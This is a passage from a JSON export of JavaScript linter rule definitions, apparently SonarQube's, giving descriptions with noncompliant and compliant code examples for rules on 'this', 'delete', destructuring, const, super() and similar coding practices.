refers to the global <code>this<\/code> object, which is the same thing as the\n<code>window<\/code> object in a standard web page. This could be confusing to maintainers. 
Instead, simply drop the <code>this<\/code>, or replace it\nwith <code>window<\/code>; it will have the same effect and be more readable.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nthis.foo = 1;   \/\/ Noncompliant\nconsole.log(this.foo); \/\/ Noncompliant\n\nfunction MyObj() {\n  this.foo = 1; \/\/ Compliant\n}\n\nMyObj.func1 = function() {\n  if (this.foo == 1) { \/\/ Compliant\n    \/\/ ...\n  }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfoo = 1;\nconsole.log(foo);\n\nfunction MyObj() {\n  this.foo = 1;\n}\n\nMyObj.func1 = function() {\n  if (this.foo == 1) {\n    \/\/ ...\n  }\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2999","repo":"javascript","name":"\"new\" operators should be used with functions","htmlDesc":"<p>The <code>new<\/code> keyword should only be used with objects that define a constructor function. Use it with anything else, and you'll get a\n<code>TypeError<\/code> because there won't be a constructor function for the <code>new<\/code> keyword to invoke.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction MyClass() {\n  this.foo = 'bar';\n}\n\nvar someClass = 1;\n\nvar obj1 = new someClass;    \/\/ Noncompliant;\nvar obj2 = new MyClass();    \/\/ Noncompliant if considerJSDoc parameter set to true. 
Compliant when considerJSDoc=false\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n\/**\n * @constructor\n *\/\nfunction MyClass() {\n  this.foo = 'bar';\n}\n\nvar someClass = function(){\n  this.prop = 1;\n}\n\nvar obj1 = new someClass;  \/\/ Compliant\nvar obj2 = new MyClass();  \/\/ Compliant regardless of considerJSDoc value\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[{"key":"considerJSDoc","htmlDesc":"Consider only functions with @constructor tag as constructor functions","defaultValue":"false","type":"BOOLEAN"}],"type":"BUG"},{"key":"javascript:S3001","repo":"javascript","name":"\"delete\" should be used only with object properties","htmlDesc":"<p>The semantics of the <code>delete<\/code> operator are a bit tricky, and it can only be reliably used to remove properties from objects. Pass\nanything else to it, and you may or may not get the desired result.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar x  = 1;\ndelete x;       \/\/ Noncompliant\n\nfunction foo(){\n..\n}\n\ndelete foo;  \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar obj = {\n  x:1,\n  foo: function(){\n  ...\n  }\n};\ndelete obj.x;\ndelete obj.foo;\n\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3358","repo":"javascript","name":"Ternary operators should not be nested","htmlDesc":"<p>Just because you <em>can<\/em> do something, doesn't mean you should, and that's the case with nested ternary operations. Nesting ternary operators\nresults in the kind of code that may seem clear as day when you write it, but six months later will leave maintainers (or worse - future you)\nscratching their heads and cursing.<\/p>\n<p>Instead, err on the side of clarity, and use another line to express the nested operation as a separate statement.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\npublic String getTitle(Person p) {\n\n  return p.gender==Person.MALE?\"Mr. 
\":p.isMarried()?\"Mrs. \":\"Miss \" + p.getLastName();  \/\/ Noncompliant\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n\n  String honorific = p.isMarried()?\"Mrs. \":\"Miss \";\n  return p.gender==Person.MALE?\"Mr. \": honorific + p.getLastName();\n<\/pre>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3500","repo":"javascript","name":"Attempts should not be made to update \"const\" variables","htmlDesc":"<p>Variables declared with <code>const<\/code> cannot be modified. Unfortunately, attempts to do so don't always raise an error; in a non-ES2015\nenvironment, such an attempt might simply be ignored.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nconst pi = \"yes, please\";\npi = 3.14;  \/\/ Noncompliant\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3509","repo":"javascript","name":"Default parameters should not cause side effects","htmlDesc":"<p>The assignment of default parameter values is generally intended to help the caller. But when a default assignment causes side effects, the caller\nmay not be aware of the extra changes or may not fully understand their implications. I.e. default assignments with side effects may end up hurting\nthe caller, and for that reason, they should be avoided.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar count = 0;\n\nfunction go(i = count++) {  \/\/ Noncompliant\n  console.log(i);\n}\n\ngo();  \/\/ outputs 0\ngo(7); \/\/ outputs 7\ngo();  \/\/ outputs 1\n<\/pre>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3513","repo":"javascript","name":"\"arguments\" should not be accessed directly","htmlDesc":"<p>The magic of JavaScript is that you can pass arguments to functions that don't declare parameters, and on the other side, you can use those\npassed-in arguments inside the no-args <code>function<\/code>. 
<\/p>\n<p>But just because you can, that doesn't mean you should. The expectation and use of arguments inside functions that don't explicitly declare them is\nconfusing to callers. No one should ever have to read and fully understand a function to be able to use it competently. <\/p>\n<p>If you don't want to name arguments explicitly, use the <code>...<\/code> syntax to specify that a variable number of arguments is expected. Then\ninside the function, you'll be dealing with a first-class array, rather than an array-like structure.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction concatenate() {\n  let args = Array.prototype.slice.call(arguments);  \/\/ Noncompliant\n  return args.join(', ');\n}\n\nfunction doSomething(isTrue) {\n  var args = Array.prototype.slice.call(arguments, 1); \/\/ Noncompliant\n  if (!isTrue) {\n    for (var arg of args) {\n      ...\n    }\n  }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction concatenate(...args) {\n  return args.join(', ');\n}\n\nfunction doSomething(isTrue, ...values) {\n  if (!isTrue) {\n    for (var value of values) {\n      ...\n    }\n  }\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3514","repo":"javascript","name":"Destructuring syntax should be used for assignments","htmlDesc":"<p>ECMAScript 2015 introduced the ability to extract and assign multiple data points from an object or array simultaneously. This is called\n\"destructuring\", and it allows you to condense boilerplate code so you can concentrate on logic. 
<\/p>\n<p>This rule raises an issue when multiple pieces of data are extracted out of the same object or array and assigned to variables.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction foo (obj1, obj2, array) {\n  var a = obj1.a;  \/\/ Noncompliant\n  var b = obj1.b;\n\n  var name = obj2.name;  \/\/ ignored; there's only one extraction-and-assignment\n\n  var zero = array[0];  \/\/ Noncompliant\n  var one = array[1];\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction foo (obj1, obj2, array) {\n  var {a, b} = obj1;\n\n  var {name} = obj2;  \/\/ this syntax works because var name and property name are the same\n\n  var [zero, one] = array;\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3516","repo":"javascript","name":"Function returns should not be invariant","htmlDesc":"<p>When a function is designed to return an invariant value, it may be poor design, but it shouldn't adversely affect the outcome of your program.\nHowever, when it happens on all paths through the logic, it is likely a mistake.<\/p>\n<p>This rule raises an issue when a function contains several <code>return<\/code> statements that all return the same value.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction foo(a) {  \/\/ Noncompliant\n  let b = 12;\n  if (a) {\n    return b;\n  }\n  return b;\n}\n<\/pre>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3523","repo":"javascript","name":"Function constructors should not be used","htmlDesc":"<p>In addition to being obtuse from a syntax perspective, function constructors are also dangerous: their execution evaluates the constructor's string\narguments similar to the way <code>eval<\/code> works, which could expose your program to random, unintended code which can be both slow and a security\nrisk.<\/p>\n<p>In general it is better to avoid it altogether, particularly when used to parse 
JSON data. You should use ECMAScript 5's built-in JSON functions or\na dedicated library.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar obj =  new Function(\"return \" + data)();  \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar obj = JSON.parse(data);\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Function calls where the argument is a string literal (e.g. <code>(Function('return this'))()<\/code>) are ignored. <\/p>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"VULNERABILITY"},{"key":"javascript:S3524","repo":"javascript","name":"Braces and parentheses should be used consistently with arrow functions","htmlDesc":"<p>Shared coding conventions allow teams to collaborate effectively. This rule raises an issue when the use of parentheses with an arrow function does\nnot conform to the configured requirements.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the configured defaults forbidding parentheses<\/p>\n<pre>\nvar foo = (a) =&gt; { \/* ... *\/ };  \/\/ Noncompliant; remove parens from arg\nvar bar = (a, b) =&gt; { return 0; };  \/\/ Noncompliant; remove curly braces from body\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar foo = a =&gt; { \/* ... *\/ };\nvar bar = (a, b) =&gt; 0;\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[{"key":"body_braces","htmlDesc":"True to require curly braces around function body. False to forbid them for single-return bodies.","defaultValue":"false","type":"BOOLEAN"},{"key":"parameter_parens","htmlDesc":"True to require parentheses around parameters. 
False to forbid them for single parameter.","defaultValue":"false","type":"BOOLEAN"}],"type":"CODE_SMELL"},{"key":"javascript:S3525","repo":"javascript","name":"Class methods should be used instead of \"prototype\" assignments","htmlDesc":"<p>Originally JavaScript didn't support <code>class<\/code>es, and class-like behavior had to be kludged using things like <code>prototype<\/code>\nassignments for \"class\" functions. Fortunately, ECMAScript 2015 added classes, so any lingering <code>prototype<\/code> uses should be converted to\ntrue <code>class<\/code>es. The new syntax is more expressive and clearer, especially to those with experience in other languages.<\/p>\n<p>Specifically, with ES2015, you should simply declare a <code>class<\/code> and define its methods inside the class declaration.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction MyNonClass(initializerArgs = []) {\n  this._values = [...initializerArgs];\n}\n\nMyNonClass.prototype.doSomething = function () {  \/\/ Noncompliant\n  \/\/ ...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass MyClass {\n  constructor(initializerArgs = []) {\n    this._values = [...initializerArgs];\n  }\n\n  doSomething() {\n    \/\/...\n  }\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3533","repo":"javascript","name":"\"import\" should be used to include external code","htmlDesc":"<p>Before ECMAScript 2015, module management had to be ad-hoc or provided by 3rd-party libraries such as Node.js, Webpack, or RequireJS. 
Fortunately,\nES2015, provides language-standard mechanisms for module management, <code>import<\/code> and <code>export<\/code>, and older usages should be\nconverted.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n\/\/ circle.js\nexports.area = function (r) {\n  return PI * r * r;\n};\n\n\/\/ foo.js\ndefine([\".\/cart\", \".\/horse\"], function(cart, horse) {  \/\/ Noncompliant\n  \/\/ ...\n});\n\n\/\/ bar.js\nconst circle = require('.\/circle.js');  \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n\/\/ circle.js\nlet area = function (r) {\n  return PI * r * r;\n}\nexport default area;\n\n\/\/ foo.js\nimport cart from \".\/cart.js\";\nimport horse from \".\/horse.js\";\n\n\/\/ bar.js\nimport circle from \".\/circle.js\"\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3579","repo":"javascript","name":"Array indexes should be numeric","htmlDesc":"<p>JavaScript is flexible enough to allow you to store values in an array with either numeric or named indexes. That is, it supports associative\narrays. But creating and populating an object in JavaScript is just as easy as an array, and more reliable if you need named members.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nlet arr = [];\narr[0] = 'a';\narr['name'] = 'bob';  \/\/ Noncompliant\narr[1] = 'foo';\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nlet obj = {\n  name: 'bob',\n  arr: ['a', 'foo']\n};\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3616","repo":"javascript","name":"Comma and logical OR operators should not be used in switch cases","htmlDesc":"<p>The comma operator (<code>,<\/code>) evaluates its operands, from left to right, and returns the second one. That's useful in some situations, but\njust wrong in a <code>switch<\/code> <code>case<\/code>. 
You may think you're compactly handling multiple values in the case, but only the last one in\nthe comma-list will ever be handled. The rest will fall through to the default.<\/p>\n<p>Similarly the logical OR operator (<code>||<\/code>) will not work in a <code>switch<\/code> <code>case<\/code>, only the first argument will be\nconsidered at execution time.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nswitch a {\n  case 1,2:  \/\/ Noncompliant; only 2 is ever handled by this case\n    doTheThing(a);\n  case 3 || 4: \/\/ Noncompliant; only '3' is handled\n    doThatThing(a);\n  case 5:\n    doTheOtherThing(a);\n  default:\n    console.log(\"Neener, neener!\");  \/\/ this happens when a==1 or a == 4\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nswitch a {\n  case 1:\n  case 2:\n    doTheThing(a);\n  case 3:\n  case 4:\n    doThatThing(a);\n  case 5:\n    doTheOtherThing(a);\n  default:\n    console.log(\"Neener, neener!\");\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3686","repo":"javascript","name":"Functions should not be called both with and without \"new\"","htmlDesc":"<p>Constructor functions, which create new object instances, must only be called with <code>new<\/code>. Non-constructor functions must not. Mixing\nthese two usages could lead to unexpected results at runtime.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction getNum() {\n  return 5;\n}\n\nfunction Num(numeric, alphabetic) {\n  this.numeric = numeric;\n  this.alphabetic = alphabetic;\n}\n\nvar myFirstNum = getNum();\nvar my2ndNum = new getNum();  \/\/ Noncompliant. An empty object is returned, NOT 5\n\nvar myNumObj1 = new Num();\nvar myNumObj2 = Num();  \/\/ Noncompliant. 
undefined is returned, NOT an object\n<\/pre>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3699","repo":"javascript","name":"The output of functions that don't return anything should not be used","htmlDesc":"<p>If a function does not return anything, it makes no sense to use its output. Specifically, passing it to another function, or assigning its\n\"result\" to a variable is probably a bug because such functions return <code>undefined<\/code>, which is probably not what was intended.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction foo() {\n}\n\na = foo();\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction foo() {\n}\n\nfoo();\n<\/pre>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3735","repo":"javascript","name":"\"void\" should not be used","htmlDesc":"<p>The <code>void<\/code> operator evaluates its argument and unconditionally returns <code>undefined<\/code>. It can be useful in pre-ECMAScript 5\nenvironments, where <code>undefined<\/code> could be reassigned, but generally, its use makes code harder to understand.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvoid (function() {\n   ...\n}());\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n(function() {\n   ...\n}());\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>No issue is raised when <code>void 0<\/code> is used in place of <code>undefined<\/code>. <\/p>\n<pre>\nif (parameter === void 0) {...}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3758","repo":"javascript","name":"Values not convertible to numbers should not be used in numeric comparisons","htmlDesc":"<p>In a Zen-like manner, <code>NaN<\/code> isn't equal to anything, even itself. So comparisons (<code>&gt;, &lt;, &gt;=, &lt;=<\/code>) where one\noperand is <code>NaN<\/code> or evaluates to <code>NaN<\/code> always return <code>false<\/code>. 
Specifically, <code>undefined<\/code> and objects that\ncannot be converted to numbers evaluate to <code>NaN<\/code> when used in numerical comparisons.<\/p>\n<p>This rule raises an issue when there is at least one path through the code where one of the operands to a comparison is <code>NaN<\/code>,\n<code>undefined<\/code> or an <code>Object<\/code> which cannot be converted to a number.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar x;  \/\/ x is currently \"undefined\"\nif (someCondition()) {\n  x = 42;\n}\n\nif (42 &gt; x) {  \/\/ Noncompliant; \"x\" might still be \"undefined\"\n  doSomething();\n}\n\nvar obj = {prop: 42};\nif (obj &gt; 24) { \/\/ Noncompliant\n  doSomething();\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar x;\nif (someCondition()) {\n  x = 42;\n} else {\n  x = foo();\n}\n\nif (42 &gt; x) {\n  doSomething();\n}\n\nvar obj = {prop: 42};\nif (obj.prop &gt; 24) {\n  doSomething();\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3776","repo":"javascript","name":"Cognitive Complexity of functions should not be too high","htmlDesc":"<p>Cognitive Complexity is a measure of how hard the control flow of a function is to understand. Functions with high Cognitive Complexity will be\ndifficult to maintain.<\/p>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"http:\/\/redirect.sonarsource.com\/doc\/cognitive-complexity.html\">Cognitive Complexity<\/a> <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[{"key":"threshold","htmlDesc":"The maximum authorized complexity.","defaultValue":"15","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"javascript:S3782","repo":"javascript","name":"Arguments to built-in functions should match documented types","htmlDesc":"<p>The types of the arguments to built-in functions are specified in the JavaScript language specifications. 
Calls to these functions should conform\nto the documented types, otherwise the result will most likely not be what was expected (e.g.: the call would always return <code>false<\/code>).<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nconst isTooSmall = Math.abs(x &lt; 0.0042);\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nconst isTooSmall = Math.abs(x) &lt; 0.0042;\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3785","repo":"javascript","name":"\"in\" should not be used with primitive types","htmlDesc":"<p>The <code>in<\/code> operator tests whether the specified property is in the specified object.<\/p>\n<p>If the right operand is of a primitive type (i.e., not an object) the <code>in<\/code> operator raises a <code>TypeError<\/code>.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar x = \"Foo\";\n\"length\" in x; \/\/ Noncompliant: TypeError\n0 in x;        \/\/ Noncompliant: TypeError\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar x = new String(\"Foo\");\n\"length\" in x;    \/\/ true\n0 in x;           \/\/ true\n\"foobar\" in x;    \/\/ false\n<\/pre>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3786","repo":"javascript","name":"Template literal placeholder syntax should not be used in regular strings","htmlDesc":"<p>JavaScript allows developers to embed variables or expressions in strings using template literals, instead of string concatenation. 
This is done by\nusing expressions like <code>${variable} <\/code> in a string between two back-ticks (<code>`<\/code>).<\/p>\n<p>When used in a regular string literal (between double or single quotes) the template will not be evaluated and will be used as a literal, which is\nprobably not what was intended.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nconsole.log(\"Today is ${date}\"); \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nconsole.log(`Today is ${date}`);\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3796","repo":"javascript","name":"Callbacks of array methods should have return statements","htmlDesc":"<p>Arrays in JavaScript have several methods for filtering, mapping or folding that require a callback. Not having a return statement in such a\ncallback function is most likely a mistake.<\/p>\n<p>This rule applies for the following methods of an array:<\/p>\n<ul>\n  <li> <code>Array.from<\/code> <\/li>\n  <li> <code>Array.prototype.every<\/code> <\/li>\n  <li> <code>Array.prototype.filter<\/code> <\/li>\n  <li> <code>Array.prototype.find<\/code> <\/li>\n  <li> <code>Array.prototype.findIndex<\/code> <\/li>\n  <li> <code>Array.prototype.map<\/code> <\/li>\n  <li> <code>Array.prototype.reduce<\/code> <\/li>\n  <li> <code>Array.prototype.reduceRight<\/code> <\/li>\n  <li> <code>Array.prototype.some<\/code> <\/li>\n  <li> <code>Array.prototype.sort<\/code> <\/li>\n<\/ul>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar merged = arr.reduce(function(a, b) {\n  a.concat(b);\n}); \/\/ Noncompliant: No return statement\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar merged = arr.reduce(function(a, b) {\n  return a.concat(b);\n});\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3799","repo":"javascript","name":"Destructuring patterns should not be empty","htmlDesc":"<p>Destructuring is a convenient way of 
extracting multiple values from data stored in (possibly nested) objects and arrays. However, it is possible\nto create an empty pattern that has no effect. When empty curly braces or brackets are used to the right of a property name most of the time the\nintent was to use a default value instead.<\/p>\n<p>This rule raises an issue when empty destructuring pattern is used.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar {a: {}, b} = myObj; \/\/ Noncompliant\nfunction foo({first: [], second}) { \/\/ Noncompliant\n  \/\/ ...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar {a = {}, b} = myObj;\nfunction foo({first = [], second}) {\n  \/\/ ...\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3828","repo":"javascript","name":"\"yield\" expressions should not be used outside generators","htmlDesc":"<p>The <code>yield<\/code> keyword is used in a generator function to return an <code>IteratorResult<\/code> to the caller. It has no other purpose, and\nif found outside such a function will raise a <code>ReferenceError<\/code> because it is then treated as an identifier.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction foo() {\n  for (var i = 0; i &lt; 5; i++) {\n    yield i * 2;\n  }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction * foo() {\n  for (var i = 0; i &lt; 5; i++) {\n    yield i * 2;\n  }\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3834","repo":"javascript","name":"\"Symbol\" should not be used as a constructor","htmlDesc":"<p><code>Symbol<\/code> is a primitive type introduced in ECMAScript2015. Its instances are mainly used as unique property keys.<\/p>\n<p>An instance can only be created by using <code>Symbol<\/code> as a function. 
Using <code>Symbol<\/code> with the <code>new<\/code> operator will raise\na <code>TypeError<\/code>.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nconst sym = new Symbol(\"foo\");   \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nconst sym = Symbol(\"foo\");\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3854","repo":"javascript","name":"super() should be invoked appropriately","htmlDesc":"<p>There are situations where <code>super()<\/code> must be invoked and situations where <code>super()<\/code> cannot be invoked.<\/p>\n<p>The basic rule is: a constructor in a non-derived class cannot invoke <code>super()<\/code>; a constructor in a derived class must invoke\n<code>super()<\/code>.<\/p>\n<p>Furthermore:<\/p>\n<p>- <code>super()<\/code> must be invoked before the <code>this<\/code> and <code>super<\/code> keywords can be used.<\/p>\n<p>- <code>super()<\/code> must be invoked with the same number of arguments as the base class' constructor.<\/p>\n<p>- <code>super()<\/code> can only be invoked in a constructor - not in any other method.<\/p>\n<p>- <code>super()<\/code> cannot be invoked multiple times in the same constructor.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass Animal {\n  constructor() {\n    super();         \/\/ Noncompliant, super() cannot be invoked in a base class\n  }\n\n  doSomething() {\n  }\n}\n\nclass Dog extends Animal {\n  constructor(name) {\n    this.name = name;\n    super.doSomething();\n    super();         \/\/ Noncompliant, super() must be invoked before \"this\" or \"super\" is used\n  }\n\n  doSomething() {\n    super();         \/\/ Noncompliant, super() cannot be invoked outside of a constructor\n  }\n}\n\nclass Labrador extends Dog {\n  constructor(name) {\n    super();         \/\/ Noncompliant, super() must be invoked with one argument\n  }\n}\n\nclass GermanShepherd extends Dog {\n  constructor(name) {\n  }                  \/\/ 
Noncompliant, super() must be invoked in constructor of derived class\n}\n\nclass FilaBrasileiro extends Dog {\n  constructor(name) {\n    super(name);\n    super(name);    \/\/ Noncompliant, super() can only be invoked once\n  }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass Animal {\n  constructor() {\n  }\n\n  doSomething() {\n  }\n}\n\nclass Dog extends Animal {\n  constructor(name) {\n    super();\n    this.name = name;\n    super.doSomething();\n  }\n\n  doSomething() {\n  }\n}\n\nclass Labrador extends Dog {\n  constructor(name) {\n    super(name);\n  }\n}\n\nclass GermanShepherd extends Dog {\n  constructor(name) {\n    super(name);\n  }\n}\n\nclass FilaBrasileiro extends Dog {\n  constructor(name) {\n    super(name);\n  }\n}\n<\/pre>\n<h2>Known Limitations<\/h2>\n<ul>\n  <li>False negatives: some issues are not raised if the base class is not defined in the same file as the current class.<\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3923","repo":"javascript","name":"All branches in a conditional structure should not have exactly the same implementation","htmlDesc":"<p>Having all branches in a <code>switch<\/code> or <code>if<\/code> chain with the same implementation is an error. Either a copy-paste error was made\nand something different should be executed, or there shouldn't be a <code>switch<\/code>\/<code>if<\/code> chain at all. Note that this rule does not\napply to <code>if<\/code> chains without <code>else<\/code>s, or to <code>switch<\/code>es without <code>default<\/code> clauses.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (b == 0) {  \/\/ Noncompliant\n  doOneMoreThing();\n}\nelse {\n  doOneMoreThing();\n}\n\nlet a = (b == 0) ? 
getValue() : getValue();   \/\/ Noncompliant\n\nswitch (i) {  \/\/ Noncompliant\n  case 1:\n    doSomething();\n    break;\n  case 2:\n    doSomething();\n    break;\n  case 3:\n    doSomething();\n    break;\n  default:\n    doSomething();\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S888","repo":"javascript","name":"Equality operators should not be used in \"for\" loop termination conditions","htmlDesc":"<p>Testing <code>for<\/code> loop termination using an equality operator (<code>==<\/code> and <code>!=<\/code>) is dangerous, because it could set up an\ninfinite loop. Using a broader relational operator instead casts a wider net, and makes it harder (but not impossible) to accidentally write an\ninfinite loop.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfor (var i = 1; i != 10; i += 2)  \/\/ Noncompliant. Infinite; i goes from 9 straight to 11.\n{\n  \/\/...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfor (var i = 1; i &lt;= 10; i += 2)  \/\/ Compliant\n{\n  \/\/...\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Equality operators are ignored if the loop counter is not modified within the body of the loop and either:<\/p>\n<ul>\n  <li> starts below the ending value and is incremented by 1 on each iteration. <\/li>\n  <li> starts above the ending value and is decremented by 1 on each iteration. 
<\/li>\n<\/ul>\n<p>Equality operators are also ignored when the test is against <code>null<\/code>.<\/p>\n<pre>\nfor (var i = 0; arr[i] != null; i++) {\n  \/\/ ...\n}\n\nfor (var i = 0; (item = arr[i]) != null; i++) {\n  \/\/ ...\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C++:2008, 6-5-2 <\/li>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/835\">MITRE, CWE-835<\/a> - Loop with Unreachable Exit Condition ('Infinite Loop') <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/EwDJAQ\">CERT, MSC21-C.<\/a> - Use robust loop termination conditions <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/GwDJAQ\">CERT, MSC21-CPP.<\/a> - Use inequality to terminate a loop whose counter changes\n  by more than one <\/li>\n<\/ul>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:StrictMode","repo":"javascript","name":"\"strict\" mode should be used with caution","htmlDesc":"<p>Even though it may be a good practice to enforce JavaScript strict mode, doing so could result in unexpected behaviors on browsers that do not\nsupport it yet. Using this feature should therefore be done with caution and with full knowledge of the potential consequences on browsers that do not\nsupport it.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction strict() {\n  'use strict';\n}\n<\/pre>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:SwitchWithoutDefault","repo":"javascript","name":"\"switch\" statements should end with \"default\" clauses","htmlDesc":"<p>The requirement for a final <code>default<\/code> clause is defensive programming. 
